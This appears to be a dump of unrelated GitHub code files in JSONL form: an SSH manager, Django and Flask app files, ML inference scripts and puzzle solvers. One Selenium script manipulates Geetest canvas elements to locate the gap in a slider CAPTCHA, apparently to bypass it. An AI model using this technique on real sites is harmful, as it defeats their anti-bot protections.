= {}\n\nif __name__ == \"__main__\":\n net = Network()\n with open('data/net.edge') as ins:\n for line in ins:\n node1_str, node2_str, weight = line.strip().split()\n net.addEdge(node1_str, node2_str, weight)\n net.show()\n","repo_name":"zyymax/online_community_detection","sub_path":"src/alg/zyy_network.py","file_name":"zyy_network.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40008255609","text":"import argparse\nimport os\nimport subprocess\nimport sys\nimport yaml\n\nimport pathlib\n\ndef yes_no_question(question=None, default=\"y\"):\n\n possible_answers = \"[Y/n]\" if default == \"y\" else \"[y/N]\"\n if question:\n answer = input(\"{} {} \".format(question, possible_answers))\n else:\n answer = input(\"{} \".format(possible_answers))\n\n if not answer:\n answer = default\n\n if answer.lower() in [\"y\", \"yes\", \"o\", \"oui\"]:\n return True\n return False\n\ndef pprint_header():\n print(\n \"Name Group ssh \"\n \" Port\"\n )\n print(\n \"-------------------------------------------------------------------------------\"\n )\n\n\ndef pprint_server(name, group, user, address, port):\n full = user + \"@\" + address\n space_1 = \" \" * (15 - len(name))\n space_2 = \" \" * (25 - len(group))\n space_3 = \" \" * (35 - len(full))\n space_4 = \" \" * (20 - len(address))\n\n print(name + space_1 + group + space_2 + user + \"@\" + address + space_3 + str(port))\n # print(\"{} ({}): {}@{}:{}\".format(name, group, user, address, port))\n\n\nhome = os.path.expanduser(\"~\")\n\nparser = argparse.ArgumentParser(description='Easy manage your ssh servers')\nparser.add_argument(\n '-f',\n '--file',\n help='Path to the yaml servers file',\n default='{}/.config/sshh/servers.yaml'.format(home),\n)\n\nsubparsers = parser.add_subparsers(dest='subcommand')\n\n# List\nparser_list = subparsers.add_parser('list')\nparser_list.add_argument('group', help='List server of group', nargs=\"?\")\n\n# Groups\nparser_list = subparsers.add_parser('groups')\n\n# Connect\nparser_connect = subparsers.add_parser('ssh')\nparser_connect.add_argument('--user', help='Connect with another user')\nparser_connect.add_argument('server', help='The server to connect')\n\n# Add\nparser_add = subparsers.add_parser('add')\nparser_add.add_argument('server', help='The server to add (user@host:port)')\nparser_add.add_argument('name', help='The server\\'s name to add')\nparser_add.add_argument('-g', '--group', help='Server group', required=True)\n\n# Add\nparser_add = subparsers.add_parser('remove')\nparser_add.add_argument('server', help='The server name to remove')\nparser_add.add_argument('-f', '--force', help='Force remove', action=argparse.BooleanOptionalAction)\n\n# parser.add_argument('--feature', action=argparse.BooleanOptionalAction)\n\n# Edit\nparser_edit = subparsers.add_parser('edit')\n\nargs = parser.parse_args()\n\n# init config file\nif not os.path.isfile(args.file):\n path = pathlib.Path(os.path.dirname(args.file))\n os.makedirs(os.path.dirname(args.file), exist_ok=True)\n with open(args.file, \"w+\") as f:\n f.write(\"servers:\\n\")\n\na_yaml_file = open(args.file)\nparsed_yaml_file = yaml.load(a_yaml_file, Loader=yaml.FullLoader)\nservers = parsed_yaml_file[\"servers\"]\n\n# Display error message if config file is empty\nif not servers:\n if args.subcommand != \"add\":\n print(\"Add a server first\")\n parser_add.print_help()\n sys.exit(1)\n\n# Display help\nif not args.subcommand:\n parser.print_help()\n\n# Display groups\nif args.subcommand == 'groups':\n groups = set([server[\"group\"] for server in servers])\n for group in groups:\n print(group)\n\n# List servers\nif args.subcommand == 'list':\n # FIXME: sort once\n sorted_list_tmp = sorted(servers, key=lambda k: k['name'])\n sorted_list = sorted(sorted_list_tmp, key=lambda k: k['group'])\n pprint_header()\n for server in sorted_list:\n if args.group:\n if len(args.group.split(\"/\")) == 1:\n requested_group = args.group\n server_groups = server[\"group\"].split(\"/\")\n if requested_group in server_groups:\n pprint_server(\n server[\"name\"],\n server[\"group\"],\n server[\"user\"],\n server[\"address\"],\n server[\"port\"],\n )\n\n else:\n requested_groups = args.group.split(\"/\")\n server_groups = server[\"group\"].split(\"/\")\n lrg = len(requested_groups)\n if requested_groups == server_groups[0:lrg]:\n pprint_server(\n server[\"name\"],\n server[\"group\"],\n server[\"user\"],\n server[\"address\"],\n server[\"port\"],\n )\n else:\n pprint_server(\n server[\"name\"],\n server[\"group\"],\n server[\"user\"],\n server[\"address\"],\n server[\"port\"],\n )\n\n# Connect to server\nif args.subcommand == 'ssh':\n for server in servers:\n if server[\"name\"] == args.server:\n user = args.user if args.user else server[\"user\"]\n cmd = \"ssh -p {} {}@{}\".format(server[\"port\"], user, server[\"address\"])\n # print(cmd)\n retcode = subprocess.call(cmd, shell=True)\n\n# Add a server\nif args.subcommand == \"add\":\n # create object\n obj = {\n \"name\": args.name,\n \"user\": args.server.split(\"@\")[0],\n \"address\": args.server.split(\"@\")[1].split(\":\")[0],\n \"port\": args.server.split(\"@\")[1].split(\":\")[1]\n if len(args.server.split(\"@\")[1].split(\":\")) == 2\n else 22,\n \"group\": args.group,\n }\n # Write it to yaml file\n if parsed_yaml_file[\"servers\"] is None:\n parsed_yaml_file[\"servers\"] = []\n parsed_yaml_file[\"servers\"].append(obj)\n with open(args.file, \"w+\") as file:\n yaml.dump(parsed_yaml_file, file)\n\n# remove a server\nif args.subcommand == \"remove\":\n\n if not args.force:\n # print(\"Remove {}? [Y/n]\".format(args.server))\n if not yes_no_question(\"Remove {}?\".format(args.server)):\n exit(0)\n\n new_servers = []\n for server in servers:\n if server[\"name\"] != args.server:\n new_servers.append(server)\n else:\n print(\"{} removed !\".format(args.server))\n\n yaml_dict = {\"servers\": new_servers}\n\n with open(args.file, \"w+\") as file:\n yaml.dump(yaml_dict, file)\n\n\n# Edit servers\nif args.subcommand == \"edit\":\n editor = os.environ.get('EDITOR')\n cmd = \"{} {}\".format(editor, args.file)\n retcode = subprocess.call(cmd, shell=True)\n","repo_name":"xgaia/sshh","sub_path":"sshh.py","file_name":"sshh.py","file_ext":"py","file_size_in_byte":6363,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"21448307444","text":"import time\r\nfrom io import BytesIO\r\nfrom PIL import Image\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver import ActionChains\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nimport random\r\n\r\ndef get_screenshot(driver):\r\n \"\"\"\r\n 获取网页截图\r\n :return: 截图对象\r\n \"\"\"\r\n screenshot = driver.get_screenshot_as_png()\r\n screenshot = Image.open(BytesIO(screenshot))\r\n return screenshot\r\ndef cut_image(driver,name):\r\n driver.save_screenshot('all.png')\r\n #image=driver.find_element_by_xpath('/html/body/div[2]/div[2]/div[6]/div/div[1]/div[1]/div/a/div[1]')\r\n a= driver.find_element_by_xpath('/html/body/div[2]/div[2]/div[6]/div/div[1]/div[1]/div/a/div[1]/div/canvas[1]')\r\n print(a.location)\r\n print(a.size)\r\n left=a.location['x']\r\n top=a.location['y']\r\n right=left+a.size['width']\r\n buttom=top+a.size['height']\r\n print('####################')\r\n print(a.size['width'],a.size['height'])\r\n print(left,top,right,buttom)\r\n print('###################')\r\n image_obj=Image.open('all.png')\r\n img=image_obj.crop((left,top,right,buttom))\r\n img.save(name)\r\n \r\ndef get_image1(driver):\r\n time.sleep(2)\r\n #js_code=var x =document.getElementsByClassName(\"geetest_canvas_slice geetest_absolute\").style.display=\"none\";)\r\n \r\n #driver.execute_script(js_code)\r\n ele=driver.find_elements_by_tag_name('canvas')\r\n \r\n '''setAttribute(ele[2],'style','display: none;')'''\r\n#set\r\n driver.execute_script(\"arguments[0].setAttribute (arguments[1],arguments[2])\",ele[2],'style','display: none;')\r\n image=cut_image(driver,'que.png')\r\n#remove\r\n driver.execute_script(\"arguments[0].removeAttribute(arguments[1])\",ele[3],'style')\r\n image=cut_image(driver,'quan.png')\r\n time.sleep(0.5)\r\n#remove\r\n driver.execute_script(\"arguments[0].removeAttribute(arguments[1])\",ele[2], 'style')\r\n time.sleep(0.5)\r\n#set\r\n driver.execute_script(\"arguments[0].setAttribute (arguments[1],arguments[2])\",ele[3], 'style', 'display: none;')\r\n\r\ndef get_gap(image1,image2):\r\n print('size',image1.size)\r\n left=0 \r\n for i in range(left,image1.size[0]):\r\n for j in range(image1.size[1]):\r\n if not is_pixel_equal(image1,image2,i,j):\r\n left=i\r\n print('left',left)\r\n return left\r\ndef is_pixel_equal(image1,image2,x,y):\r\n pixel1=image1.load()[x,y]#que'''\r\n pixel2=image2.load()[x,y]#quan'''\r\n threshold=60\r\n if abs(pixel1[0]-pixel2[0]) Table:\n table = Table(\n title=f\"Page={data.page_number} of {data.num_pages}\"\n )\n table.add_column(\"Type\")\n table.add_column(\"Title\")\n table.add_column(\"UUID\", no_wrap=True)\n table.add_column(\"Tags\")\n\n for node in data.items:\n table.add_row(\n node.ctype,\n node.title,\n str(node.id),\n ','.join(sorted(tag.name for tag in node.tags))\n )\n\n return table\n","repo_name":"papermerge/papermerge-cli","sub_path":"papermerge_cli/format/nodes.py","file_name":"nodes.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"27989502386","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n # page\n path('', views.dashboard, name='dashboard'),\n path('projects', views.allProject, name='project-all'),\n \n # authentication url\n path('register/', views.register, name='register-page'),\n path('login/', views.login, name='login-page'),\n path('logout/', views._logout, name='logout'),\n \n \n]\n\n\n","repo_name":"Apisit250aps/TaskManagement","sub_path":"page/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20628217861","text":"import torch\nfrom tqdm import tqdm\nfrom module.unet import UNet\nfrom collections import defaultdict\nimport pickle\nimport numpy as np\n\nclass DeepImpute(object):\n def __init__(self):\n self.imputer = self._load_model()\n\n\n def _load_model(self):\n result_dict = torch.load('/home/zhaojifan/Impute/ckpt/20191202-191412/10_0.47_0.72_0.90.ckpt')\n\n net_weight_dict = result_dict['model']\n\n imputer = UNet(n_channels=1, n_classes=1)\n imputer.load_state_dict(net_weight_dict)\n\n return imputer\n\n def _sample_mask(self, shape, index, prob_line=0.05):\n prob = np.random.uniform(0,1,shape)\n mask = np.uint8(prob >= prob_line)\n mask[:, index] = 0\n return mask\n\n def impute(self, haplotype : np.ndarray or list) -> np.ndarray:\n \"\"\"\n :parameters\n haplotype : 需要进行impute的数据, list或者numpy.ndarray类型\n \"\"\"\n f1_score_array = []\n nf_targets = None\n nf_predicts = None\n f_targets = None\n f_predicts = None\n fixlen = haplotype.shape[1]\n sample_num = 1000\n pos_embedding = np.exp([x/fixlen for x in range(fixlen)])\n\n from sklearn.metrics import f1_score, confusion_matrix, classification_report\n maf = np.load('tmp/maf.npy')\n filter_indexes = np.where(np.logical_and(maf >= 0.05, maf <= 0.95))[0]\n if isinstance(haplotype, list):\n haplotype = np.array(haplotype)\n if haplotype.ndim == 1:\n haplotype = np.expand_dims(haplotype, 0)\n with torch.set_grad_enabled(False):\n self.imputer.eval()\n for i in tqdm(range(haplotype.shape[1])):\n if not maf[i]:\n f1_score_array.append(-1)\n continue\n neg_sample = haplotype[haplotype[:, i] == 0, :]\n pos_sample = haplotype[haplotype[:, i] == 1, :]\n if neg_sample.shape[0] == 0 or pos_sample.shape[0] == 0:\n f1_score_array.append(-1)\n continue\n if neg_sample.shape[0] < sample_num:\n neg_over_sample = np.random.choice(neg_sample.shape[0], sample_num-neg_sample.shape[0])\n neg_over_sample = neg_sample[neg_over_sample, :]\n neg_over_sample = np.vstack((neg_sample, neg_over_sample))\n else:\n neg_over_sample = np.random.choice(neg_sample.shape[0], sample_num, replace=False)\n neg_over_sample = neg_sample[neg_over_sample, :]\n if pos_sample.shape[0] < sample_num:\n pos_over_sample = np.random.choice(pos_sample.shape[0], sample_num-pos_sample.shape[0])\n pos_over_sample = pos_sample[pos_over_sample, :]\n pos_over_sample = np.vstack((pos_sample, pos_over_sample))\n else:\n pos_over_sample = np.random.choice(pos_sample.shape[0], sample_num, replace=False)\n pos_over_sample = pos_sample[pos_over_sample]\n #print(neg_over_sample.shape, pos_over_sample.shape)\n over_sample = np.vstack((neg_over_sample, pos_over_sample))\n target = over_sample[:, i].flatten()\n nf_targets = target if nf_targets is None else np.hstack((nf_targets, target))\n if i in filter_indexes:\n f_targets = target if f_targets is None else np.hstack((f_targets, target))\n mask = self._sample_mask(over_sample.shape, i)\n net_input = over_sample * mask + 0.5 * (1 - mask) + pos_embedding\n net_input = np.expand_dims(net_input, 1)\n net_input = torch.from_numpy(net_input).float()\n net_prob = self.imputer(net_input)\n predict = np.uint8(net_prob.numpy()>=0.5)[:, i].flatten()\n nf_predicts = predict if nf_predicts is None else np.hstack((nf_predicts, predict))\n if i in filter_indexes:\n f_predicts = predict if f_predicts is None else np.hstack((f_predicts, predict))\n if np.all(target) or not np.any(target) or np.all(predict) or not np.any(predict):\n f1 = np.sum(target == predict) / len(target)\n else:\n\n f1 = f1_score(target, predict)\n print('F1_score : {:.2f} MAF : {:.2f}'.format(f1, maf[i]))\n f1_score_array.append(f1)\n print('='*50 +' 过滤掉位点的结果 ' + '='*50)\n print(confusion_matrix(f_targets, f_predicts))\n print(classification_report(f_targets, f_predicts))\n filter_f1 = np.array(f1_score_array)[filter_indexes]\n filter_f1 = filter_f1[filter_f1 != -1]\n print('[>=0.99]({:.4f}) [>=0.96]({:.4f}) [>=0.9]({:.4f})'.format(np.sum(filter_f1>=0.99)/len(filter_f1),\n np.sum(filter_f1>=0.96)/len(filter_f1),\n np.sum(filter_f1>=0.9)/len(filter_f1)))\n print('')\n print('='*50 +' 全部位点的结果 ' + '='*50)\n print(confusion_matrix(nf_targets, nf_predicts))\n print(classification_report(nf_targets, nf_predicts))\n filter_f1 = np.array(f1_score_array)\n filter_f1 = filter_f1[filter_f1 != -1]\n print('[>=0.99]({:.4f}) [>=0.96]({:.4f}) [>=0.9]({:.4f})'.format(np.sum(filter_f1>=0.99)/len(filter_f1),\n np.sum(filter_f1>=0.96)/len(filter_f1),\n np.sum(filter_f1>=0.9)/len(filter_f1)))\nif __name__ == \"__main__\":\n data = np.load('tmp/compare.npy')\n data = data[int(data.shape[0] * 0.93) + 1:,:]\n #test_data = data[:int(data.shape[0] * 0.8) + 1, :][-5:,...]\n #test_data = np.random.uniform(0,1,(5, 500))\n imputer = DeepImpute()\n imputer.impute(data)\n\n","repo_name":"Asdil/impute_unet","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":6102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39787901675","text":"from django.contrib import admin\nfrom edc_model_admin import audit_fieldset_tuple\n\nfrom ..admin_site import td_infant_admin\nfrom ..forms import InfantCovidScreeningForm\nfrom ..models import InfantCovidScreening\nfrom .model_admin_mixins import InfantCrfModelAdminMixin\n\n\n@admin.register(InfantCovidScreening, site=td_infant_admin)\nclass InfantCovidScreeningAdmin(InfantCrfModelAdminMixin, admin.ModelAdmin):\n form = InfantCovidScreeningForm\n\n fieldsets = (\n (None, {\n 'fields': [\n 'infant_visit',\n 'report_datetime',\n 'covid_tested',\n 'covid_test_date',\n 'is_test_date_estimated',\n 'covid_results',\n 'household_positive',\n 'household_test_date',\n 'is_household_test_estimated',\n 'covid_contact',\n 'covid_symptoms',\n 'comments']}\n ), audit_fieldset_tuple)\n\n radio_fields = {\n 'covid_tested': admin.VERTICAL,\n 'is_test_date_estimated': admin.VERTICAL,\n 'covid_results': admin.VERTICAL,\n 'household_positive': admin.VERTICAL,\n 'is_household_test_estimated': admin.VERTICAL,\n 'covid_contact': admin.VERTICAL}\n\n filter_horizontal = ('covid_symptoms',)\n","repo_name":"tshilo-dikotla/td-infant","sub_path":"td_infant/admin/infant_covid_screening_admin.py","file_name":"infant_covid_screening_admin.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28911497196","text":"\"\"\"Nearest neighbours method.\n\nTypical usage example:\n\n x_val, languages_characters_indexes_val = load_images(val_folder)\n\n accuracy = test_nn_accuracy(20, 50, x_val, languages_characters_indexes_val)\n\"\"\"\n\n\nimport numpy as np\nfrom model_training import make_oneshot_task\n\n\ndef nearest_neighbour_correct(pairs, targets):\n \"\"\"Checking correction of NN method.\n\n Args:\n pairs (list): Two ndarrays of images, where 1st half belongs\n to different categories, 2nd half --- to same.\n targets (ndarray): List of zeros and ones where 1 in place,\n where photo in 1st list is in the same\n category as photo in 2nd list.\n\n Returns:\n 1 if nearest neighbour gets the correct answer for a one-shot task\n given by (pairs, targets).\n \"\"\"\n\n L2_distances = np.zeros_like(targets)\n\n for i in range(len(targets)):\n L2_distances[i] = np.sum(np.sqrt((pairs[0][i] - pairs[1][i])**2))\n\n if np.argmin(L2_distances) == np.argmax(targets):\n return 1\n return 0\n\n\ndef test_nn_accuracy(N, k, x, categories, language=None):\n \"\"\"Returns accuracy of NN approach.\n\n Args:\n N (int): Number of images in support set.\n k (int): Number of experiments.\n x (ndarray): Array of arrays where each array (character) contains\n vector images (character representation).\n categories (dict): Key is language, value is list\n of 2 elements: index of 1st character\n and index of last.\n \"\"\"\n\n print(\"Evaluating nearest neighbour on {} unique {}-way one-shot learning tasks ...\".format(k, N))\n\n n_right = 0\n\n for i in range(k):\n pairs, targets = make_oneshot_task(N, x, categories, language)\n correct = nearest_neighbour_correct(pairs, targets)\n n_right += correct\n\n return n_right / k\n","repo_name":"SmirnovAlexander/OneShotLearningSiameseNetworks","sub_path":"scripts/nearest_neighbours.py","file_name":"nearest_neighbours.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36490591074","text":"numbers = open('./input.txt', 'r').read().split('\\n')\nnumbers = [int(i) for i in numbers]\n\nfound = False\nfor n1 in numbers:\n for n2 in numbers:\n n3 = 2020 - n1 - n2\n if n3 in numbers:\n found = True\n print('n1: {}, n2: {}, n3: {}, n1*n2*n3: {}'.format(n1, n2, n3, n1*n2*n3))\n break\n if found:\n break\n","repo_name":"finafisken/adventofcode2020","sub_path":"day01/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"29693760001","text":"from datetime import datetime\n\nimport pytest\nfrom flask import Flask\nfrom flask.testing import FlaskClient\n\nfrom fyyur.models import Artist, Show, Venue, db\nfrom fyyur.routes.show import get_shows\nfrom fyyur.schema.show import ShowResponse\nfrom tests.mock import mock_artist, mock_show, mock_venue\nfrom tests.utils import date_future\n\n\ndef test_get_shows_status_200(client: FlaskClient) -> None:\n response = client.get(\"/shows/\")\n assert response.status_code == 200\n assert b\"Venue1\" in response.data\n assert b\"Artist1\" in response.data\n\n\ndef add_show(\n app: Flask, client: FlaskClient, venue_id: int, artist_id: int, day_offset: int\n) -> bool:\n show = mock_show(venue_id=venue_id, artist_id=artist_id, day_offset=day_offset)\n\n prior_existed: bool = False\n existed: bool = False\n with app.app_context():\n prior_existed = (\n Show.query.filter_by(\n venue_id=show.venue_id,\n artist_id=show.artist_id,\n start_time=show.start_time,\n ).first()\n is not None\n )\n\n client.post(\"/shows/create\", data=show.model_dump())\n\n existed = (\n Show.query.filter_by(\n venue_id=show.venue_id,\n artist_id=show.artist_id,\n start_time=show.start_time,\n ).first()\n is not None\n )\n\n inserted = not prior_existed and existed\n return inserted\n\n\ndef test_create_show_successful(app: Flask, client: FlaskClient) -> None:\n with app.app_context():\n venue = mock_venue(100).to_orm(Venue)\n artist = mock_artist(200).to_orm(Artist)\n db.session.add(venue)\n db.session.add(artist)\n db.session.commit()\n\n # inserted into database\n assert add_show(app=app, client=client, venue_id=100, artist_id=200, day_offset=100)\n\n\ndef test_get_shows(app: Flask, client: FlaskClient) -> None:\n assert add_show(app=app, client=client, venue_id=1, artist_id=1, day_offset=100)\n assert add_show(app=app, client=client, venue_id=1, artist_id=2, day_offset=200)\n\n expected_shows: list[dict[str, int | str | datetime]] = [\n {\n \"venue_id\": 1,\n \"venue_name\": \"Venue1\",\n \"artist_id\": 1,\n \"artist_name\": \"Artist1\",\n \"artist_image_link\": \"https://images.artist1.com/\",\n \"start_time\": date_future(100),\n },\n {\n \"venue_id\": 1,\n \"venue_name\": \"Venue1\",\n \"artist_id\": 2,\n \"artist_name\": \"Artist2\",\n \"artist_image_link\": \"https://images.artist2.com/\",\n \"start_time\": date_future(200),\n },\n ]\n\n with app.app_context():\n all_shows = get_shows()\n dumped_shows = [show.model_dump() for show in get_shows()]\n for expected_show in expected_shows:\n assert ShowResponse.model_validate(expected_show) in all_shows\n assert expected_show in dumped_shows\n\n\n@pytest.mark.parametrize(\"venue_id, artist_id\", [(1, 100), (100, 1), (100, 100)])\ndef test_create_show_venue_or_artist_doesnt_exist(\n app: Flask, client: FlaskClient, venue_id: int, artist_id: int\n) -> None:\n assert not add_show(\n app=app, client=client, venue_id=venue_id, artist_id=artist_id, day_offset=100\n )\n\n\ndef test_create_show_duplicated(app: Flask, client: FlaskClient) -> None:\n assert add_show(app=app, client=client, venue_id=1, artist_id=1, day_offset=100)\n assert not add_show(app=app, client=client, venue_id=1, artist_id=1, day_offset=100)\n\n\ndef test_create_show_same_date_same_venue(app: Flask, client: FlaskClient) -> None:\n assert add_show(app=app, client=client, venue_id=1, artist_id=1, day_offset=100)\n assert not add_show(app=app, client=client, venue_id=1, artist_id=2, day_offset=100)\n\n\ndef test_create_show_same_date_same_artist(app: Flask, client: FlaskClient) -> None:\n assert add_show(app=app, client=client, venue_id=1, artist_id=1, day_offset=100)\n assert not add_show(app=app, client=client, venue_id=2, artist_id=1, day_offset=100)\n\n\ndef test_create_show_same_date_different_venue_and_artist(\n app: Flask, client: FlaskClient\n) -> None:\n assert add_show(app=app, client=client, venue_id=1, artist_id=1, day_offset=100)\n assert add_show(app=app, client=client, venue_id=2, artist_id=2, day_offset=100)\n\n\ndef test_create_show_in_the_past(app: Flask, client: FlaskClient) -> None:\n assert not add_show(app=app, client=client, venue_id=2, artist_id=2, day_offset=-100)\n","repo_name":"dqkqd/fyyur","sub_path":"tests/test_show.py","file_name":"test_show.py","file_ext":"py","file_size_in_byte":4507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9715442044","text":"# -*- coding: utf-8 -*-\n\nimport pytest\nfrom tests.core.renderer.xml import params\nfrom shapely.geometry import LineString\n\n\n@pytest.mark.parametrize('parameters', params) # noqa\ndef test_line(template, parameters):\n line = LineString(((0, 0), (1, 1)))\n\n def get_gml_id():\n return 'gml1'\n\n content = template.render(**{\n 'params': parameters,\n 'default_language': 'de',\n 'line': line,\n 'get_gml_id': get_gml_id\n }).decode('utf-8').split('\\n')\n expected_content = \"\"\"\n\n \n\n 0.00.0\n \n \n\n 1.01.0\n \n \"\"\".split('\\n')\n expected_lines = []\n for line in expected_content:\n expected_lines.append(line.strip())\n content_lines = []\n for line in content:\n content_lines.append(line.strip())\n assert expected_lines == content_lines\n","repo_name":"openoereb/pyramid_oereb","sub_path":"tests/core/renderer/xml/test_geometry_line.py","file_name":"test_geometry_line.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"22939422865","text":"import math\nfrom queue import PriorityQueue\nimport main\n\nclass ManhattanDistance:\n def distance(self,state):\n h = 0\n for i in range(0,len(state), 3):\n for j in range(0,3):\n xval = j\n yval = i/3\n\n if state[i+j] == '1':\n h = h + abs(xval-1) + yval\n elif state[i+j] == '2':\n h = h + abs(xval-2) + yval\n elif state[i+j] == '3':\n h = h + abs(xval) + abs(yval-1)\n elif state[i+j] == '4':\n h = h + abs(xval-1) + abs(yval-1)\n elif state[i+j] == '5':\n h = h + abs(xval-2) + abs(yval - 1)\n elif state[i+j] == '6':\n h = h + abs(xval) + abs(yval - 2)\n elif state[i+j] == '7':\n h = h + abs(xval-1) + abs(yval - 2)\n elif state[i+j] == '8':\n h = h + abs(xval-2) + abs(yval - 2)\n return h\n\n\nclass EuclideanDistance:\n def distance(self, state):\n h = 0\n for i in range(0,len(state), 3):\n for j in range(0,3):\n xval = j\n yval = i / 3\n\n if state[i + j] == '1':\n h = h + math.sqrt((xval - 1)**2 + yval**2)\n elif state[i + j] == '2':\n h = h + math.sqrt((xval - 2)**2 + yval**2)\n elif state[i + j] == '3':\n h = h + math.sqrt((xval)**2 + (yval - 1)**2)\n elif state[i + j] == '4':\n h = h + math.sqrt((xval - 1)**2 + (yval - 1)**2)\n elif state[i + j] == '5':\n h = h + math.sqrt((xval - 2)**2 + (yval - 1)**2)\n elif state[i + j] == '6':\n h = h + math.sqrt((xval)**2 + (yval - 2)**2)\n elif state[i + j] == '7':\n h = h + math.sqrt((xval - 1)**2 + (yval - 2)**2)\n elif state[i + j] == '8':\n h = h + math.sqrt((xval - 2)**2 + (yval - 2)**2)\n return h\n\n\n\n\n\ndef A_Star(initial_state, heuristic):\n g = 0\n if heuristic:\n heur = ManhattanDistance()\n else:\n heur = EuclideanDistance()\n\n goal = \"012345678\"\n frontier = PriorityQueue()\n f_frontier = set()\n explored = set()\n Parent_map = {initial_state: (initial_state, 0)}\n frontier.put((0+heur.distance(initial_state), initial_state))\n f_frontier.add(initial_state)\n maxDepth = 0\n while frontier.qsize() > 0:\n state = frontier.get()\n if state[1] in explored:\n continue\n f_frontier.remove(state[1])\n\n explored.add(state[1])\n if state[1] == goal:\n return Parent_map, len(explored), maxDepth\n\n neighbours = main.get_neighbors(state[1])\n\n for i in neighbours:\n if not (i in explored) and not (i in f_frontier):\n maxDepth = max(maxDepth,Parent_map[state[1]][1]+1)\n frontier.put((Parent_map[state[1]][1]+1+heur.distance(i), i))\n f_frontier.add(i)\n Parent_map[i] = (state[1], Parent_map[state[1]][1]+1)\n elif i in f_frontier:\n if (Parent_map[state[1]][1]+1) < Parent_map[i][1]:\n Parent_map[i] = (state[1], Parent_map[state[1]][1]+1)\n frontier.put((Parent_map[state[1]][1]+1+heur.distance(i), i))\n f_frontier.add(i)\n\n return False\n\n","repo_name":"Elbadry2025/Informed-and-Uninformed-Search-Algorithms-to-Solve-8-Puzzle","sub_path":"A_Star.py","file_name":"A_Star.py","file_ext":"py","file_size_in_byte":3589,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70560782888","text":"from django.conf.urls import patterns, url\n\nfrom rsvp import views\n\nurlpatterns = patterns('',\n # ex: /rsvp/\n url(r'^$', views.index, name='index'),\n # ex: /rsvp/5/\n # url(r'^(?P\\d+)/$', views.InviteReturnView.as_view(), name='invite_return'),\n # ex: /rsvp//\n url(r'^(?P[0-9a-z]+)/$', views.InviteReturnView.as_view(), name='invite_return'),\n # ex: /rsvp/search.json?q=Tom\n url(r'^search.json$', views.search, name='search'),\n # ex: /rsvp/thanks/\n url(r'^thanks', views.thanks, {'attending': True}, name='thanks'),\n)\n","repo_name":"haydngreatnews/engagement-party","sub_path":"rsvp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19635255473","text":"import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nclass webcam_gauge:\n \"\"\"webcam_gauge class\"\"\"\n pass\n def __init__(self, filename ='e16hbdstand.jpg')->None:\n self.filename = filename\n self.img = cv2.imread(filename)\n if self.img is None :\n print('Cannot read the file :{}'.format(filename))\n raise ValueError\n self.img_gray = cv2.cvtColor(self.img,cv2.COLOR_BGR2GRAY)\n self.img_rev = cv2.bitwise_not(self.img_gray)\n self.img_gauge = np.array([0])\n self.img_gauge_bin = np.array([0])\n\n def print(self):\n \"\"\"print itself\"\"\"\n print('filename: {}'.format(self.filename))\n\n def show_img(self):\n \"\"\"display the original figure.\"\"\"\n img_RGB = cv2.cvtColor(self.img,cv2.COLOR_BGR2RGB)\n plt.imshow(img_RGB)\n plt.show()\n\n def put_mask_circle(self,img,x1,y1,r):\n copied = img.copy()\n mask = np.zeros_like(copied)\n cv2.circle(mask,(x1,y1),r,color=(1,1,1),thickness=-1)\n copied = copied*mask\n return copied\n\n def calc_angle(self,x1,y1,x2,y2):\n if x2==x1 :\n return np.pi/2.\n else:\n angle = np.arctan((y2-y1)/(x2-x1))\n return angle\n def angle_range(self,gauge,angle):\n if gauge == 'A' or gauge == 'a':\n if ( angle < np.pi/2./90.*10. ):\n angle = angle - np.pi\n if ( angle > np.pi/2./90*10. ):\n angle = -np.pi*2+angle\n\n elif gauge == 'B' or gauge == 'b':\n if ( angle > np.pi/2./90*10.):\n angle = angle -np.pi\n return angle\n \n def find_binary_threshold(self,img):\n tmp = np.copy(img)\n tmp_1dim = np.ravel(tmp)\n tmp_sorted = np.sort(tmp_1dim)\n thresh = tmp_sorted[len(tmp_sorted)-150]\n return thresh\n\n def read_gauge(self,gauge : str):\n g = webcam_subgauge(gauge)\n x1,y1 = g.get_center()\n r = g.get_radius()\n copied = self.put_mask_circle(self.img_rev,x1,y1,r)\n self.img_gauge = copied[y1-r:y1+r,x1-r:x1+r]\n thresh = self.find_binary_threshold(self.img_gauge)\n ret, self.img_gauge_bin = cv2.threshold(\n self.img_gauge,thresh,255,cv2.THRESH_BINARY)\n \n lines = cv2.HoughLinesP(self.img_gauge_bin,rho=1,\n theta=np.pi/360,\n threshold = 10,\n minLineLength = 20,\n maxLineGap = 20)\n for x1,y1,x2,y2 in lines[0]:\n 